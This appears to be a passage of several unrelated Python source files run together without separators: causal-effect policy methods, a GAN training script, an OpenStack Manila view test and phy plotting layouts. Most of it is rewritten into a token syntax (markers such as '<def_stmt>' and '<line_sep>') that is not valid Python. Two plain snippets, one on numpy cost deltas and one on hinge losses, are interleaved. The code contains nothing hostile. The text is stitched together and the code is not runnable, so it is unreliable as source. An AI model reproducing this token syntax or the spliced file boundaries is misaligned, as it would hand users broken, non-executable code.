The second item is the per-unit-average value of applying the learned policy; if the feature is continuous this means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should be increased and decreasing the treatment by 10% of the typical amount when not. The third item is the value of always treating. This is a list, with one entry per non-control-treatment for discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount. Parameters ---------- Xtest : array-like Features feature_index Index of the feature to be considered as treatment treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_value_increase : float, default 1e-4 The minimum increase in the policy value that a split needs to create to construct it alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. Returns ------- output : _PolicyOutput """<line_sep>(intrp feature_names treatment_names (policy_val always_trt))=self._tree(<true> Xtest feature_index treatment_costs=treatment_costs max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_value_increase alpha=alpha)<def_stmt>policy_data tree node_id node_dict<block_start><return>{'treatment':treatment_names[np.argmax(tree.value[node_id])]}<block_end><return>_PolicyOutput(_tree_interpreter_to_dict(intrp feature_names policy_data) policy_val {treatment_names[i+1]:val<for>(i val) enumerate(always_trt.tolist())} treatment_names[0])<block_end># TODO: it seems like it would be better to just return the tree itself rather than plot it; # however, the tree can't store the feature and treatment names we compute here... <def_stmt>plot_heterogeneity_tree self Xtest feature_index * max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Plot an effect heterogeneity tree using matplotlib. Parameters ---------- Xtest : array-like Features feature_index Index of the feature to be considered as treatment max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_impurity_decrease : float, default 1e-4 The minimum decrease in the impurity/uniformity of the causal effect that a split needs to achieve to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. 
"""<line_sep>intrp,feature_names,treatment_names,_=self._tree(<false> Xtest feature_index max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease include_model_uncertainty=include_model_uncertainty alpha=alpha)<line_sep><return>intrp.plot(feature_names=feature_names treatment_names=treatment_names)<block_end><def_stmt>_heterogeneity_tree_output self Xtest feature_index * max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Get an effect heterogeneity tree expressed as a dictionary. Parameters ---------- X : array-like Features feature_index Index of the feature to be considered as treament max_depth : int, optional (default=3) maximum depth of the tree min_samples_leaf : int, optional (default=2) minimum number of samples on each leaf min_impurity_decrease : float, optional (default=1e-4) The minimum decrease in the impurity/uniformity of the causal effect that a split needs to achieve to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. """<line_sep>intrp,feature_names,_,_=self._tree(<false> Xtest feature_index max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease include_model_uncertainty=include_model_uncertainty alpha=alpha)<def_stmt>hetero_data tree node_id node_dict<block_start><if_stmt>include_model_uncertainty<block_start><return>{'effect':_sanitize(tree.value[node_id]) 'ci':_sanitize(node_dict[node_id]['ci'])}<block_end><else_stmt><block_start><return>{'effect':_sanitize(tree.value[node_id])}<block_end><block_end><return>_tree_interpreter_to_dict(intrp feature_names hetero_data)<block_end><def_stmt>individualized_policy self Xtest feature_index * n_rows=<none> treatment_costs=0 alpha=0.05<block_start>""" Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect. Parameters ---------- Xtest: array-like Features feature_index: int or string Index of the feature to be considered as treatment n_rows: int, optional How many rows to return (all rows by default) treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. 
For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) alpha: float in [0, 1], default 0.05 Confidence level of the confidence intervals A (1-alpha)*100% confidence interval is returned Returns ------- output: DataFrame Dataframe containing recommended treatment, effect, confidence interval, sorted by effect """<line_sep>result=self._safe_result_index(Xtest feature_index)<line_sep># get dataframe with all but selected column orig_df=pd.DataFrame(Xtest columns=self.feature_names_).rename(columns={self.feature_names_[result.feature_index]:'Current treatment'})<line_sep>Xtest=result.X_transformer.transform(Xtest)<if_stmt>Xtest.shape[1]<eq>0<block_start>x_rows=Xtest.shape[0]<line_sep>Xtest=<none><block_end><if_stmt>result.feature_baseline<is><none># apply 10% of a typical treatment for this feature <block_start>effect=result.estimator.effect_inference(Xtest T1=result.treatment_value<times>0.1)<block_end><else_stmt><block_start>effect=result.estimator.const_marginal_effect_inference(Xtest)<block_end><if_stmt>Xtest<is><none># we got a scalar effect although our original X may have had more rows <block_start>effect=effect._expand_outputs(x_rows)<block_end>multi_y=(<not>self._vec_y)<or>self.classification<if_stmt>multi_y<and>result.feature_baseline<is><not><none><and>np.ndim(treatment_costs)<eq>2# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely <block_start>treatment_costs=np.expand_dims(treatment_costs 1)<block_end>effect.translate(-treatment_costs)<line_sep>est=effect.point_estimate<line_sep>est_lb=effect.conf_int(alpha)[0]<line_sep>est_ub=effect.conf_int(alpha)[1]<if_stmt>multi_y# y was an array, not a vector <block_start>est=np.squeeze(est 1)<line_sep>est_lb=np.squeeze(est_lb 1)<line_sep>est_ub=np.squeeze(est_ub 1)<block_end><if_stmt>result.feature_baseline<is><none><block_start>rec=np.empty(est.shape[0] dtype=object)<line_sep>rec[est<g>0]="increase"<line_sep>rec[est<le>0]="decrease"<line_sep># set the effect bounds; for positive treatments these agree with # the estimates; for negative treatments, we need to invert the interval eff_lb,eff_ub=est_lb est_ub<line_sep>eff_lb[est<le>0],eff_ub[est<le>0]=-eff_ub[est<le>0] -eff_lb[est<le>0]<line_sep># the effect is now always positive since we decrease treatment when negative eff=np.abs(est)<block_end><else_stmt># for discrete treatment, stack a zero result in front for control <block_start>zeros=np.zeros((est.shape[0] 1))<line_sep>all_effs=np.hstack([zeros est])<line_sep>eff_ind=np.argmax(all_effs axis=1)<line_sep>treatment_arr=np.array([result.feature_baseline]+[lvl<for>lvl result.feature_levels] dtype=object)<line_sep>rec=treatment_arr[eff_ind]<line_sep># we need to call effect_inference to get the correct CI between the two treatment options effect=result.estimator.effect_inference(Xtest T0=orig_df['Current treatment'] T1=rec)<line_sep># we now need to construct the delta in the cost between the two treatments and translate the effect current_treatment=orig_df['Current treatment'].values<if_stmt>np.ndim(treatment_costs)<ge>2# remove third dimenions potentially added <block_start><if_stmt>multi_y# y was an array, not a vector <block_start>treatment_costs=np.squeeze(treatment_costs 1)<block_end><assert_stmt>treatment_costs.shape[1]<eq>len(treatment_arr)-1 ("If treatment costs are an array, "<concat>" they must 
be of shape (n, d_t-1),"<concat>" where n is the number of samples"<concat>" and d_t the number of treatment"<concat>" categories.")<line_sep>all_costs=np.hstack([zeros treatment_costs])<line_sep># find cost of current treatment: equality creates a 2d array with True on each row, # only if its the location of the current treatment. Then we take the corresponding cost. current_cost=all_costs[current_treatment.reshape(-1 1)<eq>treatment_arr.reshape(1 -1)]<line_sep>target_cost=np.take_along_axis(all_costs eff_ind.reshape(-1 1) 1).reshape(-1)<block_end><else_stmt><block_start><assert_stmt>isinstance(treatment_costs (int float)) ("Treatments costs should either be float or "<concat>"a 2d array of size (n, d_t-1).")<line_sep>all_costs=np.array([0]+[treatment_costs]<times>(len(treatment_arr)-1))<line_sep># construct index of current treatment current_ind=(current_treatment.reshape(-1 1)<eq>treatment_arr.reshape(1 -1))@np.arange(len(treatment_arr))<line_sep>current_cost=all_costs[current_ind]<line_sep>target_cost=all_costs[eff_ind]<block_end>delta_cost=current_cost-target_cost<line_sep># add second dimension if needed for broadcasting during translation of effect <if_stmt>multi_y<block_start>delta_cost=np.expand_dims(delta_cost 1)<block_end>effect.translate(delta_cost)<line_sep>eff=effect.point_estimate<line_sep>eff_lb,eff_ub=effect.conf_int(alpha)<if_stmt>multi_y# y was an array, not a vector <block_start>eff=np.squeeze(eff 1)<line_sep>eff_lb=np.squeeze(eff_lb 1)<line_sep>eff_ub=np.squeeze(eff_ub 1)<block_end><block_end>df=pd.DataFrame({'Treatment':rec 'Effect of treatment':eff 'Effect of treatment lower bound':eff_lb 'Effect of treatment upper bound':eff_ub} index=orig_df.index)<line_sep><return>df.join(orig_df).sort_values('Effect of treatment' ascending=<false>).head(n_rows)<block_end><def_stmt>_individualized_policy_dict self Xtest feature_index * n_rows=<none> treatment_costs=0 alpha=0.05<block_start>""" Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect. 
Parameters ---------- Xtest: array-like Features feature_index: int or string Index of the feature to be considered as treatment n_rows: int, optional How many rows to return (all rows by default) treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample alpha: float in [0, 1], default 0.05 Confidence level of the confidence intervals A (1-alpha)*100% confidence interval is returned Returns ------- output: dictionary dictionary containing treatment policy, effects, and other columns """<line_sep><return>self.individualized_policy(Xtest feature_index n_rows=n_rows treatment_costs=treatment_costs alpha=alpha).to_dict('list')<block_end><def_stmt>typical_treatment_value self feature_index<block_start>""" Get the typical treatment value used for the specified feature Parameters ---------- feature_index: int or string The index of the feature to be considered as treatment Returns ------- treatment_value : float The treatment value considered 'typical' for this feature """<line_sep>result=[res<for>res self._results<if>res.feature_index<eq>feature_index]<if_stmt>len(result)<eq>0<block_start><if_stmt>self._has_column_names<block_start>result=[res<for>res self._results<if>res.feature_name<eq>feature_index]<assert_stmt>len(result)<eq>1 f"Could not find feature with index/name {feature_index}"<line_sep><return>result[0].treatment_value<block_end><else_stmt><block_start><raise>ValueError(f"No feature with index {feature_index}")<block_end><block_end><return>result[0].treatment_value<block_end><block_end>
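The cost-translation step in the discrete-treatment branch above is the least obvious part of the routine; the following standalone numpy sketch (illustrative sample values only, not library code) reproduces how the per-sample cost delta is built from the prepended control column, the current-treatment mask, and take_along_axis.
import numpy as np

# Hypothetical example: 2 samples, a control level plus two treatment levels.
treatment_arr = np.array(["ctrl", "low", "high"], dtype=object)
treatment_costs = np.array([[1.0, 3.0],    # per-sample costs of "low" and "high"
                            [0.5, 2.0]])
current_treatment = np.array(["low", "ctrl"], dtype=object)
eff_ind = np.array([2, 1])                 # argmax over [control, effects...]

zeros = np.zeros((treatment_costs.shape[0], 1))
all_costs = np.hstack([zeros, treatment_costs])   # shape (n, d_t); control costs 0
# The boolean mask has exactly one True per row, at the current treatment's column.
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
delta_cost = current_cost - target_cost           # what gets added to the effect estimate
print(delta_cost)                                 # [-2.  -0.5]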
<import_stmt>argparse<import_stmt>copy<import_stmt>torch<import_from_stmt>torchvision.datasets MNIST CIFAR10<import_stmt>torchvision.transforms<as>TF<import_stmt>torchelie<as>tch<import_stmt>torchelie.loss.gan.hinge<as>gan_loss<import_from_stmt>torchelie.recipes.gan GANRecipe<import_stmt>torchelie.callbacks<as>tcb<import_from_stmt>torchelie.recipes Recipe<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--cpu' action='store_true')<line_sep>opts=parser.parse_args()<line_sep>device='cpu'<if>opts.cpu<else>'cuda'<line_sep>BS=32<line_sep>tfms=TF.Compose([TF.Resize(64) tch.transforms.AdaptPad((64 64)) TF.RandomHorizontalFlip() TF.ToTensor()])<line_sep>ds=CIFAR10('~/.cache/torch/cifar10' download=<true> transform=tfms)<line_sep>dl=torch.utils.data.DataLoader(ds num_workers=4 batch_size=BS shuffle=<true>)<def_stmt>train_net Gen Discr<block_start>G=Gen(in_noise=128 out_ch=3)<line_sep>G_polyak=copy.deepcopy(G).eval()<line_sep>D=Discr()<line_sep>print(G)<line_sep>print(D)<def_stmt>G_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G(z)<line_sep>preds=D(fake<times>2-1).squeeze()<line_sep>loss=gan_loss.generated(preds)<line_sep>loss.backward()<line_sep><return>{'loss':loss.item() 'imgs':fake.detach()}<block_end><def_stmt>G_polyak_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G_polyak(z)<line_sep><return>{'imgs':fake.detach()}<block_end><def_stmt>D_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G(z)<line_sep>fake_loss=gan_loss.fake(D(fake<times>2-1))<line_sep>fake_loss.backward()<line_sep>x=batch[0]<line_sep>real_loss=gan_loss.real(D(x<times>2-1))<line_sep>real_loss.backward()<line_sep>loss=real_loss.item()+fake_loss.item()<line_sep><return>{'loss':loss 'real_loss':real_loss.item() 'fake_loss':fake_loss.item()}<block_end>loop=GANRecipe(G D G_fun D_fun G_polyak_fun dl log_every=100).to(device)<line_sep>loop.register('polyak' G_polyak)<line_sep>loop.G_loop.callbacks.add_callbacks([tcb.Optimizer(tch.optim.RAdamW(G.parameters() lr=1e-4 betas=(0. 0.99))) tcb.Polyak(G G_polyak) ])<line_sep>loop.register('G_polyak' G_polyak)<line_sep>loop.callbacks.add_callbacks([tcb.Log('batch.0' 'x') tcb.WindowedMetricAvg('real_loss') tcb.WindowedMetricAvg('fake_loss') tcb.Optimizer(tch.optim.RAdamW(D.parameters() lr=4e-4 betas=(0. 0.99))) ])<line_sep>loop.test_loop.callbacks.add_callbacks([tcb.Log('imgs' 'polyak_imgs') tcb.VisdomLogger('main' prefix='test')])<line_sep>loop.to(device).run(100)<block_end>train_net(tch.models.autogan_64 tch.models.snres_discr_4l)<line_sep>
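For readers unfamiliar with gan_loss.hinge, here is a minimal sketch of the standard hinge objectives that the real/fake/generated calls above correspond to; torchelie's own implementation may differ in minor details, so treat this as a reference formulation rather than the library's code.
import torch.nn.functional as F

def hinge_real(preds):        # discriminator term on real samples
    return F.relu(1.0 - preds).mean()

def hinge_fake(preds):        # discriminator term on generated samples
    return F.relu(1.0 + preds).mean()

def hinge_generated(preds):   # generator objective
    return -preds.mean()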
# Copyright (c) 2017 Mirantis, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>ddt<import_from_stmt>manila.api.openstack api_version_request<as>api_version<import_from_stmt>manila.api.views quota_class_sets<import_from_stmt>manila test<import_from_stmt>manila.tests.api fakes<line_sep>@ddt.ddt<class_stmt>ViewBuilderTestCase(test.TestCase)<block_start><def_stmt>setUp self<block_start>super(ViewBuilderTestCase self).setUp()<line_sep>self.builder=quota_class_sets.ViewBuilder()<block_end><def_stmt>test__collection_name self<block_start>self.assertEqual('quota_class_set' self.builder._collection_name)<block_end>@ddt.data(("fake_quota_class" "2.40") (<none> "2.40") ("fake_quota_class" "2.39") (<none> "2.39") ("fake_quota_class" "2.53") (<none> "2.53") ("fake_quota_class" "2.62") (<none> "2.62") )@ddt.unpack<def_stmt>test_detail_list_with_share_type self quota_class microversion<block_start>req=fakes.HTTPRequest.blank('/quota-sets' version=microversion)<line_sep>quota_class_set={"shares":13 "gigabytes":31 "snapshots":14 "snapshot_gigabytes":41 "share_groups":15 "share_group_snapshots":51 "share_networks":16 }<line_sep>expected={self.builder._collection_name:{"shares":quota_class_set["shares"] "gigabytes":quota_class_set["gigabytes"] "snapshots":quota_class_set["snapshots"] "snapshot_gigabytes":quota_class_set["snapshot_gigabytes"] "share_networks":quota_class_set["share_networks"] }}<if_stmt>quota_class<block_start>expected[self.builder._collection_name]['id']=quota_class<block_end><if_stmt>(api_version.APIVersionRequest(microversion)<ge>(api_version.APIVersionRequest("2.40")))<block_start>expected[self.builder._collection_name]["share_groups"]=quota_class_set["share_groups"]<line_sep>expected[self.builder._collection_name]["share_group_snapshots"]=quota_class_set["share_group_snapshots"]<block_end><if_stmt>req.api_version_request<ge>api_version.APIVersionRequest("2.53")<block_start>fake_share_replicas_value=46<line_sep>fake_replica_gigabytes_value=100<line_sep>expected[self.builder._collection_name]["share_replicas"]=(fake_share_replicas_value)<line_sep>expected[self.builder._collection_name]["replica_gigabytes"]=fake_replica_gigabytes_value<line_sep>quota_class_set['share_replicas']=fake_share_replicas_value<line_sep>quota_class_set['replica_gigabytes']=fake_replica_gigabytes_value<block_end><if_stmt>req.api_version_request<ge>api_version.APIVersionRequest("2.62")<block_start>fake_per_share_gigabytes=10<line_sep>expected[self.builder._collection_name]["per_share_gigabytes"]=fake_per_share_gigabytes<line_sep>quota_class_set['per_share_gigabytes']=fake_per_share_gigabytes<block_end>result=self.builder.detail_list(req quota_class_set quota_class=quota_class)<line_sep>self.assertEqual(expected result)<block_end><block_end>
# -*- coding: utf-8 -*- """Common layouts."""<line_sep>#------------------------------------------------------------------------------ # Imports #------------------------------------------------------------------------------ <import_stmt>logging<import_stmt>numpy<as>np<import_from_stmt>phylib.utils emit<import_from_stmt>phylib.utils.geometry get_non_overlapping_boxes get_closest_box<import_from_stmt>.base BaseLayout<import_from_stmt>.transform Scale Range Subplot Clip NDC<import_from_stmt>.utils _get_texture _in_polygon<import_from_stmt>.visuals LineVisual PolygonVisual<line_sep>logger=logging.getLogger(__name__)<line_sep>#------------------------------------------------------------------------------ # Grid #------------------------------------------------------------------------------ <class_stmt>Grid(BaseLayout)<block_start>"""Layout showing subplots arranged in a 2D grid. Constructor ----------- shape : tuple or str Number of rows, cols in the grid. shape_var : str Name of the GLSL uniform variable that holds the shape, when it is variable. box_var : str Name of the GLSL variable with the box index. has_clip : boolean Whether subplots should be clipped. Note ---- To be used in a grid, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=.075<line_sep>n_dims=2<line_sep>active_box=(0 0)<line_sep>_scaling=(1. 1.)<def_stmt>__init__ self shape=(1 1) shape_var='u_grid_shape' box_var=<none> has_clip=<true><block_start>super(Grid self).__init__(box_var=box_var)<line_sep>self.shape_var=shape_var<line_sep>self._shape=shape<line_sep>ms=1-self.margin<line_sep>mc=1-self.margin<line_sep># Define the GPU transforms of the Grid layout. # 1. Global scaling. self.gpu_transforms.add(Scale(self._scaling gpu_var='u_grid_scaling'))<line_sep># 2. Margin. self.gpu_transforms.add(Scale((ms ms)))<line_sep># 3. Clipping for the subplots. <if_stmt>has_clip<block_start>self.gpu_transforms.add(Clip([-mc -mc +mc +mc]))<block_end># 4. Subplots. self.gpu_transforms.add(Subplot(# The parameters of the subplots are callable as they can be changed dynamically. shape=<lambda>:self._shape index=<lambda>:self.active_box shape_gpu_var=self.shape_var index_gpu_var=self.box_var))<block_end><def_stmt>attach self canvas<block_start>"""Attach the grid to a canvas."""<line_sep>super(Grid self).attach(canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" attribute vec2 {}; uniform vec2 {}; uniform vec2 u_grid_scaling; """.format(self.box_var self.shape_var) 'header' origin=self)<block_end><def_stmt>add_boxes self canvas shape=<none><block_start>"""Show subplot boxes."""<line_sep>shape=shape<or>self.shape<assert_stmt>isinstance(shape tuple)<line_sep>n,m=shape<line_sep>n_boxes=n<times>m<line_sep>a=1-.0001<line_sep>pos=np.array([[-a -a +a -a] [+a -a +a +a] [+a +a -a +a] [-a +a -a -a] ])<line_sep>pos=np.tile(pos (n_boxes 1))<line_sep>box_index=[]<for_stmt>i range(n)<block_start><for_stmt>j range(m)<block_start>box_index.append([i j])<block_end><block_end>box_index=np.vstack(box_index)<line_sep>box_index=np.repeat(box_index 8 axis=0)<line_sep>boxes=LineVisual()<line_sep># We exclude this interact when adding the visual. 
canvas.add_visual(boxes clearable=<false>)<line_sep>boxes.set_data(pos=pos)<line_sep>boxes.set_box_index(box_index)<line_sep>canvas.update()<block_end><def_stmt>get_closest_box self pos<block_start>"""Get the box index (i, j) closest to a given position in NDC coordinates."""<line_sep>x,y=pos<line_sep>rows,cols=self.shape<line_sep>j=np.clip(int(cols<times>(1.+x)/2.) 0 cols-1)<line_sep>i=np.clip(int(rows<times>(1.-y)/2.) 0 rows-1)<line_sep><return>i j<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>super(Grid self).update_visual(visual)<if_stmt>self.shape_var<in>visual.program<block_start>visual.program[self.shape_var]=self._shape<line_sep>visual.program['u_grid_scaling']=self._scaling<block_end><block_end>@property<def_stmt>shape self<block_start>"""Return the grid shape."""<line_sep><return>self._shape<block_end>@shape.setter<def_stmt>shape self value<block_start>self._shape=value<line_sep>self.update()<block_end>@property<def_stmt>scaling self<block_start>"""Return the grid scaling."""<line_sep><return>self._scaling<block_end>@scaling.setter<def_stmt>scaling self value<block_start>self._scaling=value<line_sep>self.update()<block_end><block_end>#------------------------------------------------------------------------------ # Boxed #------------------------------------------------------------------------------ <class_stmt>Boxed(BaseLayout)<block_start>"""Layout showing plots in rectangles at arbitrary positions. Used by the waveform view. The boxes are specified via their center positions and optional sizes, in which case an iterative algorithm is used to find the largest box size that will not make them overlap. Constructor ---------- box_pos : array-like (2D, shape[1] == 2) Position of the centers of the boxes. box_var : str Name of the GLSL variable with the box index. keep_aspect_ratio : boolean Whether to keep the aspect ratio of the bounds. Note ---- To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=.1<line_sep>n_dims=1<line_sep>active_box=0<line_sep>_box_scaling=(1. 1.)<line_sep>_layout_scaling=(1. 1.)<line_sep>_scaling_param_increment=1.1<def_stmt>__init__ self box_pos=<none> box_var=<none> keep_aspect_ratio=<false><block_start>super(Boxed self).__init__(box_var=box_var)<line_sep>self._key_pressed=<none><line_sep>self.keep_aspect_ratio=keep_aspect_ratio<line_sep>self.update_boxes(box_pos)<line_sep>self.gpu_transforms.add(Range(NDC <lambda>:self.box_bounds[self.active_box] from_gpu_var='vec4(-1, -1, 1, 1)' to_gpu_var='box_bounds'))<block_end><def_stmt>attach self canvas<block_start>"""Attach the boxed interact to a canvas."""<line_sep>super(Boxed self).attach(canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" #include "utils.glsl" attribute float {}; uniform sampler2D u_box_pos; uniform float n_boxes; uniform vec2 u_box_size; uniform vec2 u_layout_scaling; """.format(self.box_var) 'header' origin=self)<line_sep>canvas.inserter.insert_vert(""" // Fetch the box bounds for the current box (`box_var`). 
vec2 box_pos = fetch_texture({}, u_box_pos, n_boxes).xy; box_pos = (2 * box_pos - 1); // from [0, 1] (texture) to [-1, 1] (NDC) box_pos = box_pos * u_layout_scaling; vec4 box_bounds = vec4(box_pos - u_box_size, box_pos + u_box_size); """.format(self.box_var) 'start' origin=self)<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>super(Boxed self).update_visual(visual)<line_sep>box_pos=_get_texture(self.box_pos (0 0) self.n_boxes [-1 1])<line_sep>box_pos=box_pos.astype(np.float32)<if_stmt>'u_box_pos'<in>visual.program<block_start>logger.log(5 "Update visual with interact Boxed.")<line_sep>visual.program['u_box_pos']=box_pos<line_sep>visual.program['n_boxes']=self.n_boxes<line_sep>visual.program['u_box_size']=np.array(self.box_size)<times>np.array(self._box_scaling)<line_sep>visual.program['u_layout_scaling']=self._layout_scaling<block_end><block_end><def_stmt>update_boxes self box_pos<block_start>"""Update the box positions and automatically-computed size."""<line_sep>self.box_pos,self.box_size=get_non_overlapping_boxes(box_pos)<block_end><def_stmt>add_boxes self canvas<block_start>"""Show the boxes borders."""<line_sep>n_boxes=len(self.box_pos)<line_sep>a=1+.05<line_sep>pos=np.array([[-a -a +a -a] [+a -a +a +a] [+a +a -a +a] [-a +a -a -a] ])<line_sep>pos=np.tile(pos (n_boxes 1))<line_sep>boxes=LineVisual()<line_sep>box_index=np.repeat(np.arange(n_boxes) 8)<line_sep>canvas.add_visual(boxes clearable=<false>)<line_sep>boxes.set_data(pos=pos color=(.5 .5 .5 1))<line_sep>boxes.set_box_index(box_index)<line_sep>canvas.update()<block_end># Change the box bounds, positions, or size #-------------------------------------------------------------------------- @property<def_stmt>n_boxes self<block_start>"""Total number of boxes."""<line_sep><return>len(self.box_pos)<block_end>@property<def_stmt>box_bounds self<block_start>"""Bounds of the boxes."""<line_sep>bs=np.array(self.box_size)<line_sep><return>np.c_[self.box_pos-bs self.box_pos+bs]<block_end><def_stmt>get_closest_box self pos<block_start>"""Get the box closest to some position."""<line_sep><return>get_closest_box(pos self.box_pos self.box_size)<block_end># Box scaling #-------------------------------------------------------------------------- <def_stmt>_increment_box_scaling self cw=1. ch=1.<block_start>self._box_scaling=(self._box_scaling[0]<times>cw self._box_scaling[1]<times>ch)<line_sep>self.update()<block_end>@property<def_stmt>box_scaling self<block_start><return>self._box_scaling<block_end><def_stmt>expand_box_width self<block_start><return>self._increment_box_scaling(cw=self._scaling_param_increment)<block_end><def_stmt>shrink_box_width self<block_start><return>self._increment_box_scaling(cw=1./self._scaling_param_increment)<block_end><def_stmt>expand_box_height self<block_start><return>self._increment_box_scaling(ch=self._scaling_param_increment)<block_end><def_stmt>shrink_box_height self<block_start><return>self._increment_box_scaling(ch=1./self._scaling_param_increment)<block_end># Layout scaling #-------------------------------------------------------------------------- <def_stmt>_increment_layout_scaling self cw=1. 
ch=1.<block_start>self._layout_scaling=(self._layout_scaling[0]<times>cw self._layout_scaling[1]<times>ch)<line_sep>self.update()<block_end>@property<def_stmt>layout_scaling self<block_start><return>self._layout_scaling<block_end><def_stmt>expand_layout_width self<block_start><return>self._increment_layout_scaling(cw=self._scaling_param_increment)<block_end><def_stmt>shrink_layout_width self<block_start><return>self._increment_layout_scaling(cw=1./self._scaling_param_increment)<block_end><def_stmt>expand_layout_height self<block_start><return>self._increment_layout_scaling(ch=self._scaling_param_increment)<block_end><def_stmt>shrink_layout_height self<block_start><return>self._increment_layout_scaling(ch=1./self._scaling_param_increment)<block_end><block_end><class_stmt>Stacked(Boxed)<block_start>"""Layout showing a number of subplots stacked vertically. Parameters ---------- n_boxes : int Number of boxes to stack vertically. box_var : str Name of the GLSL variable with the box index. origin : str top or bottom Note ---- To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=0<line_sep>_origin='bottom'<def_stmt>__init__ self n_boxes box_var=<none> origin=<none><block_start>self._origin=origin<or>self._origin<assert_stmt>self._origin<in>('top' 'bottom')<line_sep>box_pos=self.get_box_pos(n_boxes)<line_sep>super(Stacked self).__init__(box_pos box_var=box_var keep_aspect_ratio=<false>)<block_end>@property<def_stmt>n_boxes self<block_start>"""Number of boxes."""<line_sep><return>len(self.box_pos)<block_end>@n_boxes.setter<def_stmt>n_boxes self n_boxes<block_start><if_stmt>n_boxes<ge>1<block_start>self.update_boxes(self.get_box_pos(n_boxes))<block_end><block_end><def_stmt>get_box_pos self n_boxes<block_start>"""Return the box bounds for a given number of stacked boxes."""<line_sep># Signal bounds. b=np.zeros((n_boxes 2))<line_sep>b[: 1]=np.linspace(-1 1 n_boxes)<if_stmt>self._origin<eq>'top'<block_start>b=b[::-1 :]<block_end><return>b<block_end>@property<def_stmt>origin self<block_start>"""Whether to show the channels from top to bottom (`top` option, the default), or from bottom to top (`bottom`)."""<line_sep><return>self._origin<block_end>@origin.setter<def_stmt>origin self value<block_start>self._origin=value<line_sep>self.update_boxes(self.get_box_pos(self.n_boxes))<line_sep>self.update()<block_end><def_stmt>attach self canvas<block_start>"""Attach the stacked interact to a canvas."""<line_sep>BaseLayout.attach(self canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" #include "utils.glsl" attribute float {}; uniform float n_boxes; uniform bool u_top_origin; uniform vec2 u_box_size; """.format(self.box_var) 'header' origin=self)<line_sep>canvas.inserter.insert_vert(""" float margin = .1 / n_boxes; float a = 1 - 2. / n_boxes + margin; float b = -1 + 2. / n_boxes - margin; float u = (u_top_origin ? (n_boxes - 1. 
- {bv}) : {bv}) / max(1., n_boxes - 1.); float y0 = -1 + u * (a + 1); float y1 = b + u * (1 - b); float ym = .5 * (y0 + y1); float yh = u_box_size.y * (y1 - ym); y0 = ym - yh; y1 = ym + yh; vec4 box_bounds = vec4(-1., y0, +1., y1); """.format(bv=self.box_var) 'before_transforms' origin=self)<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>BaseLayout.update_visual(self visual)<if_stmt>'n_boxes'<in>visual.program<block_start>visual.program['n_boxes']=self.n_boxes<line_sep>visual.program['u_box_size']=self._box_scaling<line_sep>visual.program['u_top_origin']=self._origin<eq>'top'<block_end><block_end><block_end>#------------------------------------------------------------------------------ # Interactive tools #------------------------------------------------------------------------------ <class_stmt>Lasso(object)<block_start>"""Draw a polygon with the mouse and find the points that belong to the inside of the polygon."""<def_stmt>__init__ self<block_start>self._points=[]<line_sep>self.canvas=<none><line_sep>self.visual=<none><line_sep>self.box=<none><block_end><def_stmt>add self pos<block_start>"""Add a point to the polygon."""<line_sep>x,y=pos.flat<if>isinstance(pos np.ndarray)<else>pos<line_sep>self._points.append((x y))<line_sep>logger.debug("Lasso has %d points." 